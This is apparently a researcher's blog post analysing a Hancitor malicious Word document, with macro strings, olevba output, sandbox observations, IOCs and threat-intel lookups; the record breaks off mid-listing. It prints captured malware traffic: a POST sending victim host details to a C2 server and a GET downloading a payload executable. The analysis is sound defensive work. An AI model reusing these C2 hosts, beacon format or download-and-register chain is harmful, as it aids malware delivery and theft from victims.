{"id":1430,"date":"2020-12-09T19:36:05","date_gmt":"2020-12-09T19:36:05","guid":{"rendered":"https:\/\/www.herbiez.com\/?p=1430"},"modified":"2020-12-09T19:46:55","modified_gmt":"2020-12-09T19:46:55","slug":"2020-12-08-hancitor-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1430","title":{"rendered":"2020-12-08 Hancitor Malspam"},"content":{"rendered":"<p>Summary<br \/>\n========<br \/>\nThis quick post stems from a tweet from <a href=\"https:\/\/twitter.com\/James_inthe_box\/status\/1336342826158735360\" rel=\"noopener\" target=\"_blank\">@James_inthe_box<\/a> about some Hancitor malware that he was seeing. After several attempts at trying to get a maldoc to download in the past, I was able to today. Out of the several links that I had, only one worked. For a list of other links that I saw, please see this <a href=\"https:\/\/pastebin.com\/4vBrTKLw\" rel=\"noopener noreferrer\" target=\"_blank\">Pastebin<\/a>. The others did what they have always done in the past &#8211; redirected me to a Docusign site. For the artifacts and such, please see my Github repo for this <a href=\"https:\/\/github.com\/bloomer1016\/2020-12-08-Hancitor-Malspam\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>.<\/p>\n<p>Analysis<br \/>\n========<br \/>\nOnce the maldoc was obtained, I figured that I would take a look at it using Didier&#8217;s strings.py script to see if anything stood out (using the -L option to sort the strings from smallest to largest). What I noticed right off the bat were some strings such as the following:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nOpenMutexA\r\nLoadImageA\r\nUSER32.dll\r\nLocal\\Temp\r\n&amp; &quot;\\ya.0wav&quot;\r\nShellExecute\r\nGet-Credential. \r\nProcess.Start&amp;quot; \r\nWindows PowerShell 4\r\nll,DllUnregisterServer\r\nC:\\Users\\win7home\\AppData\\Local\\Temp\\ya.wav\r\nC:\\Users\\win7home\\Desktop\\Builder_v5\\ya.wav\r\nc:\\DuckVowel\\tootree\\BlowSpot\\complete.pdb\r\n<\/pre>\n<p>Not seeing much of anything else, I jumped over to olevba to see what I could glean from that using the -decode and -deobf flags. Here is the end part from that run (which it was able to decode the macro as well):<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n+----------+--------------------+---------------------------------------------+\r\n|Type      |Keyword             |Description                                  |\r\n+----------+--------------------+---------------------------------------------+\r\n|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |\r\n|          |                    |opened                                       |\r\n|Suspicious|Shell               |May run an executable file or a system       |\r\n|          |                    |command                                      |\r\n|Suspicious|ShellExecute        |May run an executable file or a system       |\r\n|          |                    |command                                      |\r\n|Suspicious|Shell32             |May run an executable file or a system       |\r\n|          |                    |command                                      |\r\n|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM\/XLF)|\r\n|Suspicious|CreateObject        |May create an OLE object                     |\r\n|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |\r\n|          |                    |used to obfuscate strings (option --decode to|\r\n|          |                    |see all)                                     |\r\n|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |\r\n|          |                    |used to obfuscate strings (option --decode to|\r\n|          |                    |see all)                                     |\r\n|Suspicious|VBA obfuscated      |VBA string expressions were detected, may be |\r\n|          |Strings             |used to obfuscate strings (option --decode to|\r\n|          |                    |see all)                                     |\r\n|IOC       |W0rd.dll            |Executable file name                         |\r\n|Hex String|'\\x00\\x02\\t\\x06'    |00020906                                     |\r\n|Hex String|'\\x00\\x00\\x00\\x00\\x0|000000000046                                 |\r\n|          |0F'                 |                                             |\r\n|Base64    |'2nt'               |Module10                                     |\r\n|String    |                    |                                             |\r\n|Base64    |'2nv'               |Module12                                     |\r\n|String    |                    |                                             |\r\n|Base64    |'2nu'               |Module11                                     |\r\n|String    |                    |                                             |\r\n|Base64    |'I'                 |Scri                                         |\r\n|String    |                    |                                             |\r\n|VBA string|\\W0rd.d             |&quot;\\W&quot; &amp; &quot;0rd.d&quot;                               |\r\n|VBA string|Local\\Temp          |&quot;Loc&quot; &amp; &quot;al\\Te&quot; &amp; &quot;mp&quot;                       |\r\n|VBA string|pting.FileSystemObje|&quot;pting.FileSystem&quot; &amp; &quot;Object&quot;                |\r\n|          |ct                  |                                             |\r\n+----------+--------------------+---------------------------------------------+\r\n<\/pre>\n<p>From glancing through the macro, the macro goes and downloads a file and names it &#8220;ya.wav&#8221; which is located in the &#8220;Local\\%Temp%&#8221; directory. Looking through the deobfuscated macro, I also do see a call in there for &#8220;DllUnregisterServer&#8221; which is where the &#8220;w0rd.dll&#8221; file comes into play most likely. Since I did not see much else here in the code, I went ahead and ran it on my VM.<\/p>\n<p>From here I could see that I was pretty close on what the macro was doing. Once the maldoc was run there was a call out to &#8220;api.ipify.org&#8221; to get my IP address and then a POST to &#8220;maduabin[.]com\/8\/forum[.]php&#8221; with details of my system and a response back:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/8\/forum.php HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: maduabin.com\r\nContent-Length: 113\r\nCache-Control: no-cache\r\n\r\nGUID=12447747362005647368&amp;BUILD=0712_843923&amp;INFO=BILL-PC @ Bill-PC\\Bill&amp;EXT=&amp;IP=212.102.37.91&amp;TYPE=1&amp;WIN=6.1(x64)HTTP\/1.1 200 OK\r\nServer: nginx\/1.16.1\r\nDate: Tue, 08 Dec 2020 17:36:38 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP\/5.4.45\r\n\r\nNBYMARhAEg4OCkBVVR0bHh8cFQgPCQkfFBsOH1QZFRdVDxMNDxMSTklUHwIfBw==\r\n<\/pre>\n<p>I then saw that there was a GET request for a binary called &#8220;uiwuih43.exe&#8221; which is what I am assuming is the &#8220;w0rd.dll&#8221;:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/uiwuih43.exe HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: gadeforussenate.com\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\r\nDate: Tue, 08 Dec 2020 17:36:40 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 431995\r\nConnection: keep-alive\r\nLast-Modified: Tue, 08 Dec 2020 17:47:57 GMT\r\nETag: &quot;5fcfbc4d-6977b&quot;\r\nAccept-Ranges: bytes\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n$.......PE..L......_.V..0.....'......P...&amp;...............`....@...........................................\r\n<\/pre>\n<p>Once this is downloaded to the &#8220;C:\\Users\\%username%\\AppData\\Local\\Temp\\&#8221; directory and named &#8220;ya.wav,&#8221; it was then renamed and moved over to the &#8220;C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Templates\\W0rd.dll&#8221; folder. From here it was then registed via rundll32.exe as seen below:<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon-300x142.png\" alt=\"\" width=\"300\" height=\"142\" class=\"aligncenter size-medium wp-image-1432\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon-300x142.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon-1024x484.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon-768x363.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon-1536x727.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon-150x71.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/procmon.png 1786w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree-300x128.png\" alt=\"\" width=\"300\" height=\"128\" class=\"aligncenter size-medium wp-image-1431\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree-300x128.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree-1024x438.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree-768x328.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree-1536x657.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree-150x64.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/12\/tree.png 1841w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>From here, rundll32.exe (PID 1588) proceeded to spawn a child process of itself (PID 1776). Both of these PIDs proceeded to talk outbound with the domain &#8220;maduabin[.]com&#8221; in the form of POSTs which was similar to the POST seen above.<\/p>\n<p>Using some of the filters for ProcMon which I got from <a href=\"https:\/\/github.com\/mgeeky\/procmon-filters\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a> I noticed some of the following things:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n- rundll32.exe (PID 1776) created a svchost.exe (PID 2224) which started reading various application paths and system paths on the filesystem\r\n - Also looked for anything bitcoin\/bitcoin wallets related\r\n- svchost.exe (PID 2224) performed a lookup using &quot;api.ipify.org&quot; and created a file called &quot;kaosdma.txt&quot; with the public IP address of my VM (artifact was left in C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\KCT28PHI\\ path)\r\n- rundll32.exe (PID 1776) looked at various registry keys dealing with internet access\r\n<\/pre>\n<p>At the time of this writing, I did not see any signs of persistence setup on the VM. I also noticed that in the PCAP, the VM was communicating with a couple of various IP addresses using TCP ports 1034-1043. UDP usage did not show any oddities. <\/p>\n<p>Artifacts<br \/>\n==========<\/p>\n<p>IOCs<br \/>\n\u2014\u2013\u2014<br \/>\n185.68.93.10 \/ maduabin.com (TCP\/80)<br \/>\n185.18.52.47 (TCP\/80)<br \/>\n8.208.96.63 \/ gadeforussenate.com (TCP\/80)<br \/>\n93.184.220.29 \/ (TCP\/80)<br \/>\n23.21.252.4 \/ (TCP\/80)<br \/>\n54.225.220.115 \/ (TCP\/80)<br \/>\n8.248.113.254 \/ (TCP\/80)<\/p>\n<p>File hashes<br \/>\n\u2014\u2014\u2014\u2014\u2014\u2014\u2013<br \/>\n2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238 &#8211; 1208_37832604.doc<br \/>\nec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b &#8211; W0rd.dll<\/p>\n<p>Machinae results<br \/>\n\u2014\u2014\u2014\u2014\u2014\u2013\u2014\u2014\u2014\u2013<br \/>\n********************************************************************************<br \/>\n* Information for 185.68.93.10<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] AbuseIPDB Results<br \/>\n    [-] AbuseIPDB reports: 1<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Not Rated<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-03&#8217;, &#8216;bandieve[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-02&#8217;, &#8216;eaussill[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;maduabin[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;spardethe[.]com&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;hXXp:\/\/spardethe[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;hXXps:\/\/maduabin[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;hXXp:\/\/maduabin[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXp:\/\/maduabin[.]com\/8\/forum[.]php\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXp:\/\/eaussill[.]com\/8\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXp:\/\/maduabin[.]com\/8\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-07&#8217;, &#8216;hXXp:\/\/bandieve[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-06&#8217;, &#8216;hXXp:\/\/eaussill[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-04&#8217;, &#8216;hXXp:\/\/bandieve[.]com\/8\/forum[.]php\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-04&#8217;, &#8216;hXXp:\/\/bandieve[.]com\/8\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-04&#8217;, &#8216;hXXps:\/\/bandieve[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-03&#8217;, &#8216;hXXps:\/\/eaussill[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-03&#8217;, &#8216;hXXp:\/\/eaussill[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-03&#8217;, &#8216;hXXp:\/\/eaussill[.]com\/8\/forum[.]php\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-02&#8217;, &#8216;hXXp:\/\/eaussill[.]com\/8\/&#8217;)<br \/>\n[-] No ThreatCrowd IP Report Results<\/p>\n<p>********************************************************************************<br \/>\n* Information for maduabin.com<br \/>\n* Observable type: fqdn (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No URLVoid Results<br \/>\n[-] No URL Unshorten Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;185[.]68.93.10&#8217;)<br \/>\n[-] No McAfee Threat Results<\/p>\n<p>********************************************************************************<br \/>\n* Information for 185.18.52.47<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] AbuseIPDB Results<br \/>\n    [-] AbuseIPDB reports: 1<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-01&#8217;, &#8216;kvmnl01-22132[.]fornex[.]org&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-11-26&#8217;, &#8216;otsoebabe[.]com&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXps:\/\/otsoebabe[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXp:\/\/otsoebabe[.]com\/8\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-07&#8217;, &#8216;hXXp:\/\/cussoricti[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-01&#8217;, &#8216;hXXp:\/\/otsoebabe[.]com\/8\/forum[.]php\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-01&#8217;, &#8216;hXXp:\/\/otsoebabe[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-11-20&#8217;, &#8216;hXXp:\/\/185[.]18.52.47\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-11-11&#8217;, &#8216;hXXps:\/\/cussoricti[.]com\/&#8217;)<br \/>\n[-] No ThreatCrowd IP Report Results<\/p>\n<p>********************************************************************************<br \/>\n* Information for 8.208.96.63<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[-] No AbuseIPDB Results<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Not Rated<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;gade4senate[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;gadebrigade[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;gadeforsenate[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;gadeforsenator[.]com&#8217;)<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;gadeforussenate[.]com&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;hXXp:\/\/gadeforussenate[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;hXXp:\/\/gadeforussenate[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-09&#8217;, &#8216;hXXp:\/\/gadeforussenate[.]com\/163.exe\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXp:\/\/gadeforussenate[.]com\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-08&#8217;, &#8216;hXXps:\/\/gadeforussenate[.]com\/&#8217;)<br \/>\n[-] No ThreatCrowd IP Report Results<\/p>\n<p>********************************************************************************<br \/>\n* Information for gadeforussenate.com<br \/>\n* Observable type: fqdn (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No URLVoid Results<br \/>\n[-] No URL Unshorten Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Business<br \/>\n[-] No McAfee Threat Results<\/p>\n<p>********************************************************************************<br \/>\n* Information for 93.184.220.29<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] AbuseIPDB Results<br \/>\n    [-] AbuseIPDB reports: 110<br \/>\n[-] No RansomwareTracker Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Information and Computer Security<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS data from VirusTotal: (&#8216;2020-11-23&#8217;, &#8216;sg[.]symcb[.]com&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-12-07&#8217;, &#8216;hXXp:\/\/93[.]184.220.29\/&#8217;)<br \/>\n[-] No McAfee Threat Results<br \/>\n[+] ThreatCrowd IP Report Results<br \/>\n    [-] Passive DNS: (&#8216;cdn[.]digicert[.]com&#8217;, &#8216;2020-11-10&#8217;)<br \/>\n    [-] Passive DNS: (&#8216;ocsp.digicert.com.69.1.6c6969c6[.]roksit[.]net&#8217;, &#8216;2020-11-28&#8242;)<br \/>\n    [-] Passive DNS: (&#8217;93[.]184.220.29&#8217;, &#8216;2020-12-02&#8217;)<br \/>\n    [-] Passive DNS: (&#8216;bvsebn4jzwc57mggqcjqs3nrju.1.0.jglcsapd2lcyqqbypj4luwor5y.3w4t3ha[.]dns0[.]org&#8217;, &#8216;2020-12-09&#8217;)<br \/>\n    [-] Known Malware Hash: 008d61c7e71f71815810ccacf54f4fc2<br \/>\n    [-] Known Malware Hash: 02767e8cc7c3a80bb2e2b1cb1ccdcf5b<br \/>\n    [-] Known Malware Hash: 03e65fbca95c55b2cb40ba0fa8aa16b4<br \/>\n    [-] Known Malware Hash: 0dc99c742a9346aa8474528b64a3bbd4<br \/>\n    [-] Known Malware Hash: 12219fa7c6864ef90d8a700dc2660450<br \/>\n    [-] Known Malware Hash: 1408cea92978508640d1dee4e22b5384<br \/>\n    [-] Known Malware Hash: 155ca23cd8f32e6b949de4863e08726c<br \/>\n    [-] Known Malware Hash: 16f16b191c01042dab2cca8406ac37a8<br \/>\n    [-] Known Malware Hash: 1a11f106ceb01bd7fa55612b45170c6a<br \/>\n    [-] Known Malware Hash: 1c47579a3f9d728377e956a4207cef27<br \/>\n    [-] Known Malware Hash: 2104c98cf906bb7d3a88b7e471e8e316<br \/>\n    [-] Known Malware Hash: 22172af4761a14a9c9fd3fb25c7e9181<br \/>\n    [-] Known Malware Hash: 222dc070ac4d8fdbb2c4645750a72e86<br \/>\n    [-] Known Malware Hash: 287f6de92849fba5203f94b419d52ea4<br \/>\n    [-] Known Malware Hash: 28f2b86fcb7b7cecd36923dfcfeb2456<br \/>\n    [-] Known Malware Hash: 297479a976ea14118b83afbad3bb3f44<br \/>\n    [-] Known Malware Hash: 2e3856e60726d447c224fec9d6b3efe2<br \/>\n    [-] Known Malware Hash: 32753b03512d3ae84e2b3d71560ad1bd<br \/>\n    [-] Known Malware Hash: 34401354c1818242012f6180ece7f051<br \/>\n    [-] Known Malware Hash: 34f424a1c9d08bf131689d2e5e80e710<br \/>\n    [-] Known Malware Hash: 364e3660e4399c213eaf2c83506ca795<br \/>\n    [-] Known Malware Hash: 39b905e9a7939e6ebdda9a85af651b6d<br \/>\n    [-] Known Malware Hash: 3d7f076e745efa6c2bbd637b4bdcdf4b<br \/>\n    [-] Known Malware Hash: 400cd3412b77e8e8957b55120f05b064<br \/>\n    [-] Known Malware Hash: 407816c12d7b15024f8535e1886de4e3<br \/>\n    [-] Known Malware Hash: 43a863cec165857b55138a3bb7ba80af<br \/>\n    [-] Known Malware Hash: 453079c819bcca32275ca2fc5d5d409b<br \/>\n    [-] Known Malware Hash: 4577b4f37e8e017a877ccb6a39240b80<br \/>\n    [-] Known Malware Hash: 47c35a5770035289fe8d8fea77bce2b8<br \/>\n    [-] Known Malware Hash: 48a058e3f4fd7adef124ef7c2147bd26<br \/>\n    [-] Known Malware Hash: 4ab037cbd928234b267e01a25c91f76c<br \/>\n    [-] Known Malware Hash: 4b73d2c8f843090d98035437a9f73e6a<br \/>\n    [-] Known Malware Hash: 4cccf7e01d0e58b25b88359826acf9af<br \/>\n    [-] Known Malware Hash: 4e8177209842471212715c5f7f2d8801<br \/>\n    [-] Known Malware Hash: 51a3c0cbf6cd201396dcf2f5f3612af7<br \/>\n    [-] Known Malware Hash: 545432a74263cef73fe99f5888747b8e<br \/>\n    [-] Known Malware Hash: 5985d8286f913fd3eeb5101318c69718<br \/>\n    [-] Known Malware Hash: 59a6501d0c16bd6c8e56a09dda0cb4bd<br \/>\n    [-] Known Malware Hash: 5acc539355258122f8cdc7f5c13368e1<br \/>\n    [-] Known Malware Hash: 5e46640828bdf9fbad37b5178dcd1dd9<br \/>\n    [-] Known Malware Hash: 644536250fedb45b2cae354cda11aeef<br \/>\n    [-] Known Malware Hash: 672b221378f53c9b2a45f6ff100be357<br \/>\n    [-] Known Malware Hash: 6745fa5768222f5bde3a1fa6c774b28e<br \/>\n    [-] Known Malware Hash: 69e6900cd860737eeba9b2b3bf0d71b4<br \/>\n    [-] Known Malware Hash: 6f26014edcf48dc0f4588a08b3a78fa3<br \/>\n    [-] Known Malware Hash: 7195376e8087cc1f388bcede563077e3<br \/>\n    [-] Known Malware Hash: 768646c048513a0906b7f5df3bc5ed3c<br \/>\n    [-] Known Malware Hash: 7a6f420348d5a06a6a22482a59f4fe9d<br \/>\n    [-] Known Malware Hash: 7b7bc095ab57ea9e1b95f69ec3339ba5<br \/>\n    [-] Known Malware Hash: 7e6185bac1c37b59074f35e2b7108093<br \/>\n    [-] Known Malware Hash: 826b425d88600d44127bb1c887b8e706<br \/>\n    [-] Known Malware Hash: 834eac4e8dcb1e25d97c86cd1c673f5b<br \/>\n    [-] Known Malware Hash: 85c004bf3ab8cf01662cb288ea9ae5db<br \/>\n    [-] Known Malware Hash: 8adb8c91d0d5ec2f107b21997978e7b6<br \/>\n    [-] Known Malware Hash: 8bfa9f96c3da4b8a4a5bafa99fba258c<br \/>\n    [-] Known Malware Hash: 92fe5ff45c1b0b952cf95894d3e5f039<br \/>\n    [-] Known Malware Hash: 9366f36464a6f66daf3dd18aad620d4b<br \/>\n    [-] Known Malware Hash: 96aadac7d3a0616bcaf9b5d1001ace57<br \/>\n    [-] Known Malware Hash: 98c1ad5734e5889302edb695241c70ad<br \/>\n    [-] Known Malware Hash: 99017441b34a09bc449e8a7307243f4b<br \/>\n    [-] Known Malware Hash: 9e7e95d726b0d3e5cfb69ab90eddfe4e<br \/>\n    [-] Known Malware Hash: a39f7f890e4aa66827afb5511ec8623b<br \/>\n    [-] Known Malware Hash: a85ff92b8bf166872885b29e77807115<br \/>\n    [-] Known Malware Hash: a9e4734d2f50e9a884f43c0cb1e46f46<br \/>\n    [-] Known Malware Hash: ad9df601fbcc60413af1c0637717add4<br \/>\n    [-] Known Malware Hash: b1e2ae56447ee9ee9bc3178490e0155b<br \/>\n    [-] Known Malware Hash: b8b35f26235ae10b4f97195a3c04bfde<br \/>\n    [-] Known Malware Hash: b8bbef3f4d7ba13c5bde0849731718dd<br \/>\n    [-] Known Malware Hash: c0d3eacc48a41057de0838c09b97a3a7<br \/>\n    [-] Known Malware Hash: c2d8ee8e7603da95fafeaf018bac99f9<br \/>\n    [-] Known Malware Hash: c345cc11822bc3005ad6144b0fc15fce<br \/>\n    [-] Known Malware Hash: c415a66ab37a072c0279c9f902b85fc2<br \/>\n    [-] Known Malware Hash: c65f767a0e2209f1177dbf0955e74eb6<br \/>\n    [-] Known Malware Hash: c7a6d45c9fb24e74760c0e85f927532a<br \/>\n    [-] Known Malware Hash: d020316652cbfa9eeb97d093e9df9c1f<br \/>\n    [-] Known Malware Hash: d8062f01439148efce2b87248ea0f1f7<br \/>\n    [-] Known Malware Hash: de70d10aa65617ab056c90375786afbf<br \/>\n    [-] Known Malware Hash: e45823ae0d754fc0206f14c1fc43eb74<br \/>\n    [-] Known Malware Hash: e4d7099f1c188da54fd1e569f758b4b4<br \/>\n    [-] Known Malware Hash: e65ee09c4d5b8ff3ed92279ebf145a90<br \/>\n    [-] Known Malware Hash: ea94e325debb0d86d377678130ee8ce6<br \/>\n    [-] Known Malware Hash: eb6b7520d0fc4517f523e8305b9ce76d<br \/>\n    [-] Known Malware Hash: f1379d73f381f5f5ea486043e26c20ef<br \/>\n    [-] Known Malware Hash: feebada441e07bc21ddde1ac9b1eed7e<br \/>\n    [-] Known Malware Hash: ffda27dc13dd98337e531cecdba37d7d<\/p>\n<p>********************************************************************************<br \/>\n* Information for 23.21.252.4<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[-] No AbuseIPDB Results<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Not Rated<br \/>\n[+] VirusTotal pDNS Results<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-11-26&#8217;, &#8216;hXXp:\/\/23[.]21.252.4\/&#8217;)<br \/>\n    [-] pDNS malicious URLs from VirusTotal: (&#8216;2020-11-16&#8217;, &#8216;(hXXp):\/\/api[.]ipify[.]org\/&#8217;)<br \/>\n[-] No McAfee Threat Results<br \/>\n[+] ThreatCrowd IP Report Results<br \/>\n    [-] Passive DNS: (&#8216;ec2-23-21-252-4.compute-1[.]amazonaws[.]com&#8217;, &#8216;2020-12-09&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for 54.225.220.115<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\n[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[-] No AbuseIPDB Results<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Not 